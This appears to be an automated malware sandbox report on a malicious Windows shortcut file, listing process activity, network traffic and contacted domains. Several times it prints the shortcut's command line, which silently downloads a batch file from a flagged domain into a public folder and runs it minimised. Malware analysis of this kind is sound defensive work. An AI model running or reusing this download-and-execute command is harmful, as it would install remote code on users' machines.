Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Italic.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Medium.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/wp-json/
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/xmlrpc.php
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://tvdseo.com/xmlrpc.php?rsd
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://use.fontawesome.com/releases/v5.15.4/css/all.css?ver=2.0.3
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&amp;refurl=https
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.google.com/maps/embed?pb=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&amp;ver=3.0
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-4HCELHBG2B
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=GT-M3LB298
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-185801756-1
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-THFFBK43
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://www.youtube.com/channel/UCjt7SG-LPi6OafmLxoc1ULg
Source: UDkXtQleTB.bat.2.dr String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown HTTPS traffic detected: 104.21.81.137:443 -> 192.168.2.7:49703 version: TLS 1.2

System Summary
barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: document.lnk.download.lnk LNK file: /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: classification engine Classification label: mal72.winLNK@7/1@1/2
Source: C:\Windows\SysWOW64\curl.exe File created: C:\Users\Public\UDkXtQleTB.bat Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: document.lnk.download.lnk LNK file: ..\..\..\Windows\SysWOW64\cmd.exe

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: curl.exe, 00000002.00000003.1292734170.0000000003630000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562561 Sample: document.lnk.download.lnk Startdate: 25/11/2024 Architecture: WINDOWS Score: 72 23 tvdseo.com 2->23 29 Antivirus detection for URL or domain 2->29 31 Windows shortcut file (LNK) starts blacklisted processes 2->31 33 Machine Learning detection for sample 2->33 35 3 other signatures 2->35 8 cmd.exe 1 2->8         started        signatures3 process4 signatures5 37 Windows shortcut file (LNK) starts blacklisted processes 8->37 11 curl.exe 2 8->11         started        15 cmd.exe 1 8->15         started        17 conhost.exe 1 8->17         started        process6 dnsIp7 25 tvdseo.com 104.21.81.137, 443, 49703 CLOUDFLARENETUS United States 11->25 27 127.0.0.1 unknown unknown 11->27 21 C:\Users\Public\UDkXtQleTB.bat, HTML 11->21 dropped 19 conhost.exe 15->19         started        file8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.81.137
 tvdseo.com United States
13335 CLOUDFLARENETUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
tvdseo.com 104.21.81.137 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://tvdseo.com/file/quan.bat true
  • Avira URL Cloud: phishing
 unknown